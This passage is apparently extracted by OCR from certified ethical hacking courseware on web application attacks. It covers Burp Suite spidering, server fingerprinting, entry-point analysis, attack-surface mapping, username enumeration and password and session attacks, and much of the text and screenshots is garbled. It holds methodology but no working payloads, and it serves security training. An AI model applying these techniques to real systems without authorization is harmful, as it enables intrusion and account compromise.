using a no the r.
W e b spidereing using Burp Suite is done in th e fo llo w in g m anner:
1. Configure y o u r w e b b ro w s e r to use Burp as a local proxy
2. Access th e e n tire ta rg e t application visiting every single link/URL possible, and s u b m it all
th e application fo rm s available
3. Browse th e ta rg e t application w ith JavaScript enabled and disabled, and w ith cookies
enabled and disabled
4. Check th e site m ap g enerated by th e Burp proxy, and id e n tify any hidden application
c o n te n t or fu nctio ns
M odule 13Page 1837

5. C ontinue these steps recursively until no fu rth e r c o n te n t or fu n c tio n a lity is ide ntifie d
burp suite free edition v1.4.01
scanner
attack type sniper
length: 4652 payload positions
ciear§
auto §
refresh
GET / t h ? i d = S I •4 5 8 766 150048 223 I S i p id = 5 1 •1 5 H T T P /1 .1
H o s t: ts 4 .m m .b in g .n e t
P r o x y -C o n n e c tio n : k e e p - a liv e
U s e r-A g e n t: H o z illa / 5 . 0 (V in d o v s NT 6 .2 ; ¥0V64)
A p p le V e b K it/5 3 7 .4 (KHTML, l i k e Gecko)
C h ro m e /2 2 .0 .1 2 2 9 .9 4 S a fa r i/ 5 3 7 . 4
A c c e p t: * / *
R e fe r e r :
h t t p : / / v v v .b in g .c o m /im a g e s /3 e a rc h ? q “ b ik e s 4 id *6 C C C 7 6 7 0
65C1CD3A9D2EABE86351FE8575D12594SF0RM‫־‬ IQFRBA
A c c e p t-E n c o d in g : g z i p , d e f la t e , s d c h clear
f target 1 positions | payloads [ options
burp intruder repeater window about
intruder | repeater | sequencer | decoder j comparer ’ options | alerts
spider
___________* ‫ו‬7£‫נ‬
J 0 matches
intruder attack 1
attack save columns
Filter showing all items
target ' positions [ payloads ' options
comment
baseline request
status error time... length
10443
□ 193
10443‫ה‬‫ח‬
□
sfc
200
400
payloadposition
200
Web Service Attack
Web Service Attack.
results
request
request [ response
raw ‫|־‬ params | headers j hex
GET / t h ? ic l - 1 . 4 5 8 7 6 6 1 5 0 0 4 8 2 2 3 l& p id - 1 . 1 H T T P /1. 1
H o s t: ts 4 .m m .b in g .n e t
P to x y - C o n n e c tio n : k e e p - a liv e
U s e r-A g e n t: M o z il la / 5 . 0 (W indow s NT 6 .2 ; ¥0¥64) A p p le W e b K it/5 3 7 .4
(KHTML, l i k e G ecko) C h ro ro e /2 2 .0 .1 2 2 9 .9 4 S a fa r i/ 5 3 7 . 4
A c c e p t: * / *
R e fe r e r :
h t t p : / / v v v .b in g .c o m /im a g e s /s e a rc h ? q = b ik e s S id = 6 C C C 7 6 7 0 6 5 C lC D 3 A 9 D 2 E A B E 8 6 3
51FE8575D12S94SFORM=IQFP.BA
A c c e p t-E n c o c lin g : g z ip , d e f la t e , s d c h
A c c e p t-L a n g u a g e : e n -U S ,e n ;q = 0 .8
A c c e p t- C h a rs e t: IS O - 8 8 5 9 - 1 ,u t f- 8 ; q = 0 . 7 , * ;c [“ 0 .3
r iAn«_r-1ngp_____________________________________________
(z h z h z h :
inished
F IG U R E 1 3 .3 4 : S e rv e r I d e n t if ic a t io n /B a n n e r G ra b b in g
M odule 13Page 1838

C E H
W e b S p i d e r i n g U s i n g M o z e n d a
W e b A g e n t B u i l d e r
J M o z e n d a W e b A g e n t
B u ild e r c r a w ls t h r o u g h
a w e b s it e a n d h a r v e s ts
p a g e s o f i n f o r m a t i o n
Copyright © by E&Couacil. All Rights Reserved. Reproduction is Strictly Prohibited.
W e b S p i d e r i n g U s i n g M o z e n d a W e b A g e n t B u i l d e r
Source: h ttp ://w w w .m o z e n d a .c o m
M ozenda W e b A g en t B uilder is a W in d o w s a pp lica tion used to build y o u r data e xtraction
project. It crawls th ro u g h a w eb site and harvests pages o f in fo rm a tio n . W e b A gent B uilder is a
to o l suite th a t includes an in tu itiv e Ul and a brow ser-based in stru ctio n set. Setting up y o u r
c ra w le r is as sim ple as p oin tin g and clicking to naviga te pages and capture th e in fo rm a tio n you
w an t.
M odule 13Page 1839

(m occnda WebAgentl (not saved) - Mocenda Web Agent Ouildci - ‫ם‬ ‫א‬
Me & 0 I cot Agent ^ ‫^־־‬ hrtp-,7wxw‫׳‬ be«ouy rc n ‫(׳‬ * » A * m u n g ..-j;v w -c » « -/-;^ -,-M )K 7 ’ ► O © rm htip top1«... S O - c i p
rShare1 8 ‫י‬ Pi0d « t
Writ* o Rovtew
Choose son order Date: Newest
CustomerRating U
LovtMrnnviv atn9/2010
3/JJPTCRZYfromRO-IIOMC,CAReadsirure/6w3
Picture Quolty 5.0
Sound Quatty ^ ; &0
Features SO
Whet's greet about i t WASVERY EASYTC SET UP, REMOTEEASYTO USEFORFEATURES
*GREAT =>CTl.REAMDFEATJRESVERY USERFREMDLY. EASYTOSETUP‫־‬
Would you recommend this product to afriend?! yes ^
Was T tt r»/ew reep‫־‬U? res Ho Repor nappr33na:e review
Siere J-isF.oBft.
Customer Retina & & & & '. U
furryP ictjre C'/IWO'C
ReviewRating Review Wouldrecommend
EZ^H What‫־‬*greataboutitWASVERVEAS. Yet
3.0 Wttifsgreataboutit.GreatSoundWh... No
d.o Whet'sgreetaboutit:nicefeatuiesW... Yes
AJ) What'sgreataooutit goodprice,loo... Yet
New Action
Use the tools below to peifoint actions on tlie oauc
Cick an item
O f Capture text or image
‫ט‬ Set user input
Create a list of items
Selected Action
Modify the behavior of the selected action
y View action properties
& Change item location
Use the tools above to add a new action to this page 0modify the behavior of the currently selected action
Page L
Begin Rem List •Item Namelist
Capture Item Name
Capture Rice
capture. Rating
Capture • Model
Click Item
End Uit
Begin Item list • Review Ratingl...
Capture • Review Rating
Capture Review
Capture Would recommend
•l1‫נ‬/toadynjytr[!]/2]»‫]ד‬ / drv[4) / d i r l 1v[2J/e
F IG U R E 1 3 .3 5 : W e b S p id e r in g U s in g M o z e n d a W e b A g e n t B u ild e r
M odule 13Page 1840

Attack Session Attack Attack
Management Data Connectivity Web Services
Mechanism
Attack Attack
Web Servers Authentication
Mechanism
W e b A p p H a c k i n g M e t h o d o l o g y
A t t a c k W e b S e r v e r s
Once you co n d u ct full scope fo o tp rin tin g on w e b in fra stru ctu re , analyze th e gathered
in fo rm a tio n to fin d th e v u ln era bilitie s th a t can be e xplo ite d to launch atta cks on w e b servers.
Then a tte m p t to attack w e b servers using various te chn iqu es available. Each and every w ebsite
or w e b application is associated w ith a w e b server th a t has code fo r serving a w eb site or w eb
application. The a tta c k e r e x p lo its th e vu ln e ra bilitie s in th e code and launches th e attacks on
th e w e b server. Detailed in fo rm a tio n a b o u t hacking w e b servers w ill be explained on th e
fo llo w in g slides.
M odule 13Page 1841

H a c k i n g W e b s e r v e r s
— 5 . Once th e a tta cke r identifies th e w e b server e n v iro n m e n t, attackers scan fo r kn ow n
vu ln era bilitie s by using a w e b server v u ln e ra b ility scanner. V u ln e ra b ility scanning helps th e
a tta cker to launch th e attack easily by id e n tify in g th e e xploita ble vu ln era bilitie s present on th e
w e b server. Once th e a tta cker gathers all th e p o te n tia l v u ln e ra b ilitie s , he or she tries to e xploit
th e m w ith th e help o f various attack techn iqu es to c o m p ro m is e th e w e b server. In o rd e r to stop
th e w e b server fro m serving le g itim a te users o r clients, th e atta cker launches a DoS attack
against th e w e b server. You can launch attacks on th e vu ln era ble w e b server w ith th e help o f
to ols such as UrIScan, Nikto, Nessus, A cunetix W e b V u ln e ra b ility Scanner, W e b ln spe ct, etc.
M odule 13Page 1842

C E H
W e b S e r v e r H a c k i n g T o o l :
W e b l n s p e c t
t ’‫ו‬■ ■
"•*‫י״‬®**‫*י‬ ‫־‬•2‫״‬‫־‬‫ג‬"*
- • w o u
J W e b ln s p e c t id e n tifie s s e c u rity
v u ln e ra b ilitie s in th e w e b
a p p lica tio n s
J It ru n s in te ra c tiv e scans using
a s o p h is tic a te d use r in te rfa c e
J A tta c k e r can e x p lo it id e n tifie d
v u ln e ra b ilitie s to c a rry o u t
w e b se rv ic e s a tta cks
https://download.hpsm artupdate.com
W e b s e r v e r H a c k i n g T o o l : W e b l n s p e c t
Source: h ttp s ://d o w n lo a d .h p s m a rtu p d a te .c o m
W e b ln s p e c t so ftw a re is w e b application security assessment so ftw a re designed to th o ro u g h ly
analyze today's c o m p le x w eb applications. It delivers fast scanning ca p a b ilitie s, broad
assessment coverage, and accurate w e b applica tion scanning results. It identifies security
vu ln era bilitie s th a t are u nd e te cta b le by tra d itio n a l scanners. A ttackers can e xp lo it th e
id e n tifie d v u ln era bilitie s fo r launching w e b services attacks.
M odule 13Page 1843

Im *•. Tm*. Uf •««*. M*
J . a t■■!**■"‘* ’■!■ '‫י‬ ‫י‬—‫־‬»♦ ‫נ‬ ‫•׳‬ ‫^׳‬
—
‫־‬ [OtWNWI__ j
■jj>------m
s!
!!
•**r «M>*«
Crmtt
MM•tax 1«M
*•;..*‫־‬‫ז‬•*• ! IM.'‫►׳‬«i*m« I
a*wwit•**‫״‬■‫י‬
acM*.
ftm*»;
*tM>V
‫י‬■L1_J‫©,*-״״‬
—‫ה‬‫י‬
‫״־יו‬ kmbNMK t »wwm
zsrCL. h
u w*‫•*-״‬~‫~י‬«‫~י‬ ‫ץ‬ u
■ W‫׳‬v—~ OwlMKvti H I • • 1 •• t •
«*♦»«!‫*י‬*‫•י‬
■ I p
« ! ! * I t• I •
•«•‫״״"״״‬“ 1 1 •
5s^,hK« l« 1 • t 1 •
‫י‬•• •
9 l•
8
: *
w 1•
- •"— -
•»w»11nn>»1t(m)»n«m#n!mwmm
*!**•*MHiMt
X. - ‫״‬
F IG U R E 1 3 .3 6 : W e b ln s p e c t T o o l S c re e n s o t
Ethical Hacking and C ounterm easures Copyright © by EC-C0l1nCil
M odule 13Page 1844

Exam 312-50Certified Ethical Hacker
Mechanism
Attack Attack
Mechanism
A n a l y z e W e b A p p l i c a t i o n s
Analyzing th e w e b application helps you in id e n tifyin g d iffe re n t vu ln era ble points th a t can be
e xploita ble by th e atta cke r fo r co m p ro m is in g th e w e b a p p lic a tio n . Detailed in fo rm a tio n a b o u t
analyzing a w e b a pp lica tion and ide n tifyin g th e e n try points to break into th e w e b application
w ill be discussed on th e fo llo w in g slides.
M odule 13Page 1845

Analyze Web Applications AEHitfciul N«h««
■ A n a ly z e t h e a c tiv e a p p lic a tio n 's f u n c t io n a lit y a n d te c h n o lo g ie s in o r d e r t o id e n t if y t h e a t t a c k
s u r fa c e s t h a t it e x p o s e s
Identify Server-Side
Functionality
O bserve th e a p p lica tio n s
revealed to th e clie n t to
id e n tify th e server-side
stru c tu re and fu n c tio n a lity
Map the Attack
Surface
Id e n tify the various attack surfaces
uncovered by the applications and
the vulnerabilities th a t are associated
w ith each one
Identify Entry Points for
User Input
R eview th e g e n e ra te d HTTP
re q u e st to id e n tify th e
in p u t e n try p o in ts
Identify Server-Side
Technologies
F in g e rp rin t th e te ch n o lo g ie s
active on th e server using
va rio u s fin g e rp rin t te ch n iq u e s
such as HTTP fin g e rp rin tin g
Copyright © by E&Ctuacil.All RightsReserved.!Reproduction isStrictly Prohibited.
™ j A n a l y z e W e b A p p l i c a t i o n s
---------- W e b applications have various vu lnerabilities. First, basic k n ow le d g e related to th e
w e b application has to be acquired by th e a tta cker and th e n analyze th e active a p p lic a tio n 's
fu n c tio n a lity and technologies in o rd e r to id e n tify th e a ttack surfaces th a t it exposes.
Id e n tify E ntry P oints fo r User In p u t
The e n try p o in t o f an a pp lica tion serves as an e n try p o in t fo r attacks; these e n try points include
th e fro n t-e n d w e b application th a t listens fo r HTTP requests. Review th e generated HTTP
request to id e n tify th e user in p u t e n try points.
Id e n tify Server-side F u n c tio n a lity
Server-side fu n c tio n a lity refers to th e a b ility o f a server th a t executes program s on o u tp u t w e b
pages. Those are scripts th a t reside and also a llo w running intera ctive w e b pages or w eb sites
on p a rticula r w e b servers. Observe th e applications revealed to th e client to id e n tify th e server-
side stru ctu re and fu n c tio n a lity .
Id e n tify Server-side Tech nologies
Server-side te chnologies or server-side scripting refers to th e dynam ic g e n era tio n o f w e b pages
th a t are served by th e w e b servers, as th e y are opposed to static w e b pages th a t are in th e
storage o f th e server and served to w e b browsers. Fingerprint th e technologies active on th e
server using various fin g e rp rin t te chn iqu es such as HTTP fin g e rp rin tin g .
M odule 13Page 1846

M a p th e A tta c k Surface
Id e n tify th e various attack surfaces uncovered by th e applications and th e vu ln era bilitie s th a t
are associated w ith each one.
M odule 13Page 1847

A n a l y z e W e b A p p l i c a t i o n s :
I d e n t i f y E n t r y P o i n t s f o r U & e r I n p u t
Identify HTTP header parameters
that can be processed by the
application as user inputs such as
User-Agent, Referer, Accept,
Accept-Language, and Host headers
Tools used:
« Burp Suite
» HttPrint
‫ט‬ WebScarab
‫ט‬ OWASP Zed Attack Proxy
Examine URL, HTTP Header,
query string parameters, POST
data, and cookies to
determine all user input fields
Determine URL encoding
techniques and other
encryption measures
implemented to secure the
web traffic such as SSL
.Copyright © by E&CaiHGO. All RightsReserved.!Reproduction isStrictly Prohibited.
A n a l y z e W e b A p p l i c a t i o n s : I d e n t i f y E n t r y P o i n t s f o r
U s e r I n p u t
Q During th e w e b a pp lica tion analysis, attackers id e n tify e n try points fo r user in p u t so th a t
th e y can understand th e w a y th e w e b app lication accepts or handles th e user input.
Then th e a tta cker tries to fin d th e vu ln era bilitie s present in in p u t m echanism and tries
to e x p lo it th e m so th a t a tta cker can associate w ith o r gain access to th e w eb
application. Examine URL, HTTP H eader, q u e ry strin g p a ra m e te rs , POST data , and
cookies to d e te rm in e all user in p u t fields.
0 Id e n tify HTTP h e a d e r p a ra m e te rs th a t can be processed by th e application as user
inputs such as U ser-Agent, Referrer, Accept, Accept-Language, and Host headers.
0 D eterm in e URL e nco ding te c h n iq u e s and o th e r e n c ry p tio n m easures im p le m e n te d to
secure th e w e b tra ffic such as SSL.
The tools used to analyze w e b applications to id e n tify e n try points fo r user in p u t include Burp
Suite, H ttP rin t, W ebS carab, OW ASP Zed A tta c k Proxy, etc.
M odule 13Page 1848

A n a l y z e W e b A p p l i c a t i o n s : I d e n t i f y
S e r v e r - S i d e T e c h n o l o g i e s
E xa m in e s e ssio n to k e n s :
a JSESSIONID - Java
« ASPSESSIONID-IIS
server
« ASP.NET_Sessionld ‫־‬
ASP.NET
» PHPSESSID - PHP
Examine the
e r r o r p a g e messages
E xa m ine URLs for file
extensions, directories,
and other identification
information
Perform a detailed s e rv e r
fin g e rp rin tin g , analyze
HTTP headers and HTML
source code to identify
server side technologies
U i w http://juggyboy.com/8rror.aspx
O o p s !
Server Error in ,/ReportServer' Application.
Couldnotfindthepermissionsetnamed'ASP.Net'.
Description:Anunhandedexceptionoccurredduringthe
executionofthecurrentwebrequest.Pleasereviewthestack
traceformoreinformationabouttheerrorandwhereit
originatedinthecode.
VersionInformation:Microsoft.NetFrameworkVersion
4.0.30319;ASP.NetVersion4.0.30319.1
1
Microxaft-IISJfl 0
SunONE Webserver 0 0, Net&c«*pe-Er4e<pr*e/4 1
MicrosafMIS/6 0
Apache;2 0.32 !Fedora)
Micro*oft-IIS'6.0.0
' > Server Side Technologies < •
A n a l y z e W e b A p p l i c a t i o n s : I d e n t i f y S e r v e r - S i d e
T e c h n o l o g i e s
Source: h ttp ://n e t-s q u a re .c o m
A fte r ide n tifyin g th e e n try points th ro u g h user inputs, attackers try to id e n tify server-side
te chn olo gie s.
The server-side te chnologies can be id e n tifie d as fo llo w s:
1. P erform a detailed server fin g e rp rin tin g , analyze HTTP headers and HTML source code
to id e n tify server side technologies
Examine URLs fo r file extensions, directories, and o th e r id e n tific a tio n in fo rm a tio n
Examine th e e rro r page messages
Examine session tokens:
e JSESSION ID - Java
© ASPSESSION I D - I I S server
e ASP.NET_SessionlD-ASP.NET
e PHPSESS ID - P H P
M odule 13Page 1849

P H
r.com/error.aspxh«p://jueev1>oy
Server Error in ’/ReportServer' Application.
Could not find the permission set named 'ASP.Net'.
Description: An unhanded exception occurred during the
execution of the current web request. Please review the stack
trace for more information about the error and where it
originated in the code.
Version Information: Microsoft Net Framework Version
4.0.30319; ASP.Net Version 4.0.30319.1
w e b s e rv e r fin g e rp rin tin g re p o rt
host port banner reported banner deduced e e s i
www airsahara net 80 Microsoft-IIS/6 0 Mlcrosoft-IIS/6.0 L l l _______ 1
easicoastfight com Apache/2.0.52 (Fedora) Apache/2.0.x V 1 4
www redhat.com 4•: 3 ~y Apache Apache/1.3.27 V ' n
www cnn com ~ Apache Apache/2 0.x 1 1 1
chaseon1jne.chase.com 443 7‫־‬ JPMC1.0 SunONE Webserver 6.0. Netscape-Emerpnse/4.1 — i
wwwfoundstone.com 80 WebSTAR Apache/2.0.x V I‫ן‬‫ן‬
wwwwalmart.com SC Microsoft-IIS/6 0.0 Apache/2.0.x V 1 1 1
ffuu por 30sc/‫־‬.ware com 80
Yes we are using
ServerMask!
Microsoft-lIS/4.0. M»crosoft-IIS5.0‫׳‬ ASP.NET. Microsoft-
IIS/5.1
>•‫׳‬Server Side Technologies-<;
F IG U R E 1 3 .3 7 : I d e n t if y S e rv e r-S id e T e c h n o lo g ie s
M odule 13Page 1850

A n a l y z e W e b A p p l i c a t i o n s : I d e n t i f y s* c i ■
S e r v e r - S i d e F u n c t i o n a l i t y H i —5!
Examine pagesource and URLs and make an educated guess to determine the
internal structure and functionality of web applications
GNU Wget http://www.gnu.org
Teleport Pro http://www. tenmax.com
&
BlackWidow http://softbytelabs.com
Tools ^ > >
used:©
ASPX Platform
A
E x a m i n e U R L
SSL
A
h t t p s : / / w w w . j u g g y b o y . c o m / c u s t o m e r s . a s p x ? n a m e = e x i s t i n g % 2 0 c l i e n t s & i s A c t i v e =
O S s t a r t D a t e = 2 0 % 2 F l l % 2 F 2 0 1 0 S e n d D a t e = 2 0 % 2 F 0 5 % 2 F 2 0 1 l & s h o w B y = n a m e
A n a l y z e W e b A p p l i c a t i o n s : I d e n t i f y S e r v e r - s i d e
F u n c t i o n a l i t y
Once th e server-side technologies are d e te rm in e d , id e n tify th e server-side fu n c tio n a lity . This
helps you to find th e p o te n tia l v u ln era bilitie s in server-side fu nctio na litie s. Examine page
source and URLs and m ake an educated guess to d e te rm in e th e in te rn a l s tru c tu re and
fu n c tio n a lity o f w e b a pp lica tion s.
T o o l s U s e d :
0 % W g e t
— — Source: h ttp ://w w w .g n u .o rg
GNU W g e t is fo r retrievin g files using HTTP, HTTPS, and FTP, th e m ost w idely-used In te rn e t
protocols. It is a n o n -in te ra c tiv e co m m a n d -lin e to o l, so it can be called fro m scripts, cron jobs,
te rm in a ls w ith o u t X -W in do w s su pp ort, etc.
T e l e p o r t P r o
Source: h ttp ://w w w .te n m a x .c o m
T e le p o rt Pro is an all-purpose high-speed to o l fo r g e ttin g data fro m th e In te rn et. Launch up to
te n s im u ltan e ou s retrieval threads, access p a s s w o rd -p ro te c te d sites, filte r files by size and
M odule 13Page 1851

type, and search fo r keyw ords. Capable o f rea din g H TM L 4.0, CSS 2.0, and DHTM L, T T e le p o rt
can find all files available on all w ebsites by m eans o f w e b spidering w ith server-side image m ap
e xplora tion , a u to m a tic dial-up connecting, Java a pp le t su pp ort, variable e xplo ra tio n depths,
p ro je ct scheduling, and relinking abilities.
B l a c k W i d o w
____ ‫״‬ Source: h ttp ://s o ftb v te la b s .c o m
B la ckW ido w scans a site and creates a co m p le te pro file o f th e site's s tru c tu re , files, e xte rn a l
links and even link errors. B la ckW ido w w ill d o w n lo a d all file types such as pictures and images,
audio and MP3, videos, d ocu m e nts, ZIP, program s, CSS, M a cro m e d ia Flash, .pdf, PHP, CGI, HTM
to M IM E types fro m any w ebsites. D ow n lo ad video and save as m any d iffe re n t video fo rm a ts,
such as YouTube, MySpace, Google, MKV, MPEG, AVI, DivX, XviD, MP4, 3GP, W M V , ASF, MOV,
QT, VOB, etc. It can n o w be c o n tro lle d p ro g ra m m a tic a lly using th e built-in Script In te rp re te r.
ASPX Platform
A
E xam ine URL
SSL
A
h t t p s : //w w w .ju g g y b o y . c o m /c u s to m e rs . a s p x ? n a m e = e x is tin g % 2 0 c lie n ts & is A c tiv e =
0&startDate=20%2Fll%2F2010SendDate=20%2F05%2F2011&showBy=name
V
- > D a ta b a s e C o lu m n <•■
F IG U R E 1 3 .3 8 : B la c k W id o w
If a page URL starts w ith h ttps instead o f h ttp , th e n it is kn o w n as a SLL ce rtifie d page. If a page
co ntains an .aspx e xtension, chances are th a t th e a pplication is w ritte n using ASP.NET. If th e
q ue ry string has a p a ra m e te r nam ed showBY, th e n you can assume th a t th e app lication is using
a database and displays th e data by th a t value.
M odule 13Page 1852

A n a l y z e W e b A p p l i c a t i o n s : M a p
t h e A t t a c k S u r f a c e
-------------------------------------------
I n f o r m a t i o n
₪ ₪ ₪ ₪ ₪ ₪ m ₪ m
------------------------------------------------
A t t a c k
|-----------------------------------------------
-------------------------------------------- -
I n f o r m a t i o n
-------------------------------------------- -
A t t a c k
■ ■ ■ ■ ■ ■ ■ ■ ■ ■ ■
C lient-S ide V a lid a tio n
In je c tio n A tta ck,
A u th e n tic a tio n A tta ck
In je c tio n A tta ck
Privilege Escalation,
Access C o ntrols
Database In te ra c tio n
SQL In je c tio n , Data
Leakage
C leartext
C o m m u n ica tio n
Data T h e ft, Session
H ijacking
File U p load and
D o w nload
D ire cto ry Traversal E rror M essage In fo rm a tio n Leakage
D isplay o f
U ser-S upplied Data
Cross-Site S crip ting Em ail In te ra c tio n Em ail In je c tio n
D yn am ic R edirects
R e direction, H eader
In je c tio n
A p p lic a tio n Codes B u ffe r O ve rflo w s
Login
U sernam e E n u m e ra tio n ,
Passw ord Brute-Force
T h ird -P a rty
A p p lic a tio n
K n ow n V u ln e ra b ilitie s
E xp lo ita tio n
Session S tate
Session H ijacking,
Session Fixation
W eb Server S o ftw a re
K n ow n V u ln e ra b ilitie s
E xp lo ita tio n
A n a l y z e W e b A p p l i c a t i o n s : M a p t h e A t t a c k S u r f a c e
There are various e n try points fo r attackers to c o m p ro m is e th e n e tw o rk , so p ro p e r
analysis o f th e attack surface m ust be done. The m ap pin g o f th e attack surface includes
th o ro u g h checking o f possible v u ln e ra b ilitie s to launch th e attack. The fo llo w in g are th e
various factors th ro u g h w hich an atta cker collects th e in fo rm a tio n and plans th e kind o f attack
to be launched.
M odule 13Page 1853

I n f o r m a t i o n A t t a c k I n f o r m a t i o n
!^ m m ₪ ₪ ₪ a ₪ ₪ a ₪ m
A t t a c k
■ ■ ■ ■ ■ ■ ■ ■ ■
Client-Side Validation
Injection Attack,
Authentication Attack
Injection Attack
Privilege Escalation,
Access Controls
Database Interaction
SQL Injection, Data
Leakage
Cleartext
Communication
Data Theft, Session
Hijacking
File Upload and
Download
Directory Traversal Error Message Information Leakage
Display of
User-Supplied Data
Cross-Site Scripting Email Interaction Email Injection
Dynamic Redirects
Redirection, Header
Injection
Application Codes Buffer Overflows
Login
Username Enumeration,
Password Brute-Force
Third-Party
Application
Known Vulnerabilities
Exploitation
Session State
Session Hijacking,
Session Fixation
Web Server Software
Known Vulnerabilities
Exploitation
F IG U R E 1 3 .3 9 : M a p t h e A tta c k S u rfa c e
M odule 13Page 1854

Mechanism
Attack Attack
Mechanism
In w e b applications, th e a u th e n tic a tio n fu n c tio n a lity has m an y design loopholes such
as bad passwords, i.e. sh o rt or blank, c o m m o n d ic tio n a ry w o rd s or names, passwords set th e
same as user nam e, and those still set to d e fa u lt values. The a tta cker can e x p lo it th e
v u ln e ra b ilitie s in th e a u th e n tic a tio n m e ch a n ism fo r gaining access to th e w e b a pp lica tion or
n e tw o rk . The various th re a ts th a t e xp lo it th e w eaknesses in th e a u th e n tic a tio n m echanism
include n e tw o rk eavesdropping, b ru te fo rce attacks, d ic tio n a ry attacks, cookie replay attacks,
credential th e ft, etc.
M odule 13Page 1855

C E H
_ _
A t t a c k A u t h e n t i c a t i o n
M e c h a n i s m
A t t a c k A u t h e n t i c a t i o n M e c h a n i s m
U ‫־‬^ M o s t o f th e a u th e n tic a tio n m echanism s used by w e b applications have design flaws. If
an a tta cker can id e n tify those design flaws, he or she can easily e xp lo it th e flaw s and gain
u na uth o rize d access. The design flaw s include failing to check passw ord s tren gth, insecure
tra n s p o rta tio n o f credentials over th e In te rn et, etc. W e b applications usually a u th e n tic a te th e ir
clients o r users based on a c o m b in a tio n o f user nam e and password. Hence, th e a u th e n tic a tio n
m e ch a n ism a tta c k involves id e n tify in g and e xploitin g th e user nam e and passwords.
U s e r N a m e E n u m e r a t i o n
User nam es can be e n u m e ra te d in tw o ways; one is v e rb ose fa ilu re messages and th e
o th e r is p redictable user names.
V e r b o s e F a i l u r e M e s s a g e
— ' In a typical login system, th e user is req uired to e n te r tw o pieces o f in fo rm a tio n , th a t
is, user nam e and passw ord. In som e cases, an a pp lica tion w ill ask fo r som e m ore
in fo rm a tio n . If th e user is try in g to log in and fails, th e n it can be inferre d th a t a t least one o f
th e pieces o f th e in fo rm a tio n th a t is p rovided by th e user is in c o rre c t or in c o n s is te n t w ith the
o th e r in fo rm a tio n pro vided by th e user. The application discloses th a t p a rticula r in fo rm a tio n
th a t is provided by th e user was in co rre ct o r inconsistent; it w ill be p ro vid in g g ro u n d fo r an
a tta cker to e xp lo it th e application.
M odule 13Page 1856

Exam ple:
© A cco un t < usernam e> n o t fo u n d
© The passw ord provided inco rre ct
© A cco un t < usernam e> has been locked o u t
P r e d i c t a b l e U s e r N a m e s
Some o f th e applications a u to m a tic a lly gen erate a ccou nt user nam es according to
som e p redictable sequence. This makes it very easy w ay fo r th e a tta cke r w h o can
discern th e sequence fo r p o te n tia l exhaustive list o f all v a lid user nam es.
P a s s w o r d A t t a c k s
Passwords are cracked based on:
© Password fu n c tio n a lity exploits
© Password guessing
© B rute-force attacks
S e s s i o n A t t a c k s
The fo llo w in g are th e types o f session attacks e m p lo ye d by th e a tta cker to attack the
a u th e n tic a tio n m echanism :
© Session pre dictio n
© Session b ru te -fo rcin g
© Session poisoning
C o o k i e E x p l o i t a t i o n
The fo llo w in g are th e types o f cookie e x p lo ita tio n attacks:
© Cookie poisoning
© Cookie sniffing
© Cookie replay
M odule 13Page 1857

Exam 312-50 Certified Ethical HackerEthical Hacking and C ounterm easures
UserNameEnumeration CEHUrtifWd ItliK4I lUilwt
I f l o g i n e r r o r s t a t e s w h i c h p a r t o f t h e u s e r n a m e a n d p a s s w o r d i s n o t c o r r e c t , g u e s s
t h e u s e r s o f t h e a p p l i c a t i o n u s i n g t h e t r i a l - a n d - e r r o r m e t h o d
N o te : User nam e en u m e ra tio n fro m verbose e rro r messages w ill fa il if th e a p p lica tio n im plem e nts acco u n t lo cko u t policy
i.e., locks accou nt a fte r a ce rta in num ber o f fa ile d login a tte m p ts
U s e r N a m e E n u m e r a t i o n
Source: h ttp s ://w o rd p re s s .c o m
User nam e e n u m e ra tio n helps in guessing login IDs and passw ords o f users. If th e login e rro r
states w h ich p a rt o f th e user nam e and passw ord are n o t c o rre ct, guess th e users o f th e
a p p lica tio n using th e tria l-a n d -e rro r m e th o d .
Look at th e fo llo w in g p ictu re th a t show s e n u m e ra tin g user nam es fro m verbose fa ilu re
messages:
M odule 13 Page 1858

W o r d P r e s s .c o m
ERROR: The password you entered (or the email or
username nmmatthews is incorrect Lost vour
password?
Email or Username
rin im a tth e w s
Password
□ Remember Me
Register I Lost your password?
- BacMo WordPress com
Log In
W o r d P r e s s .c o m
ERROR Invalid email or username Lost your
password?
Email o r usernam e
rin i.m a tth e w s
Password
□ Remember Me
Register I Lost your password?
— Back to WordPress com
Log In
Username rini.m atthew s does not exist Username successfully enumerated to rinim atthew s
F I G U R E 1 3 . 4 0 : U s e r N a m e E n u m e r a t i o n
Note: User nam e e n u m e ra tio n fro m verbose e rro r m essages w ill fa il if th e a p p lica tio n
im p le m e n ts a ccou nt lo c k o u t policy, i.e., locks th e a ccou nt a fte r a ce rta in n u m b e r o f fa ile d login
a tte m p ts .
Som e a p p lica tio n s a u to m a tic a lly g en erate a cco u n t user nam es based on a sequence (such as
u s e rlO l, u s e rl0 2 , etc.), and a tta ckers can d e te rm in e th e sequence and e n u m e ra te valid user
nam es.

CEHPassword Attacks: Password
Functionality Exploits
D eterm ine passw ord change fu n c tio n a lity w ith in the
a p p lica tio n by spidering th e a p p lica tio n o r creating a login
accou nt
Try random strings fo r'O ld Password', 'N e w Password', and
'C o n firm the N ew Password' fields and analyze erro rs to
id e n tify v u ln e ra b ilitie s in passw ord change fu n c tio n a lity
'F orgot Password' fe a tu re s generally present a challenge to
the user; if th e num ber o f a tte m p ts is n o t lim ite d , a tta cke r
can guess th e challen ge an sw e r successfully w ith the help o f
social engineering
A pplications m ay also send a u n iq u e re co ve ry URL o r existing
passw ord to an em ail address specified by the a tta cke r if the
challenge is solved
"R e m em ber M e " fu n ctio n s are im plem e nte d using a sim ple
persistent cookie, such as R em em berU se r= jason o r a
persistent session id e n tifie r such as
R em em berU ser=ABY 112010
A ttackers can use an enu m erated user nam e o r p redict the
session id e n tifie r to bypass a u th e n tic a tio n m echanism s
P a s s w o r d A t t a c k s : P a s s w o r d F u n c t i o n a l i t y E x p l o i t s
Password attacks are th e te ch n iq u e s used by th e a tta c k e r fo r d isco vering passw ords.
A ttacke rs e x p lo it th e passw ord fu n c tio n a lity so th a t th e y can bypass th e a u th e n tic a tio n
m e ch a n ism .
P a s s w o r d C h a n g i n g
D e te rm in e passw ord change fu n c tio n a lity w ith in th e a p p lica tio n by sp id ering th e
a p p lica tio n o r c re a tin g a login account. T ry ra n d o m strings fo r O ld Passw ord, N ew
Passw ord, and C on firm th e N ew Password fie ld s and analyze e rro rs to id e n tify v u ln e ra b ilitie s in
passw ord change fu n c tio n a lity .
P a s s w o r d R e c o v e r y
^ ‫-י‬ — F orgot Password fe a tu re s g en erally p re se n t a challenge to th e user; if th e n u m b e r o f
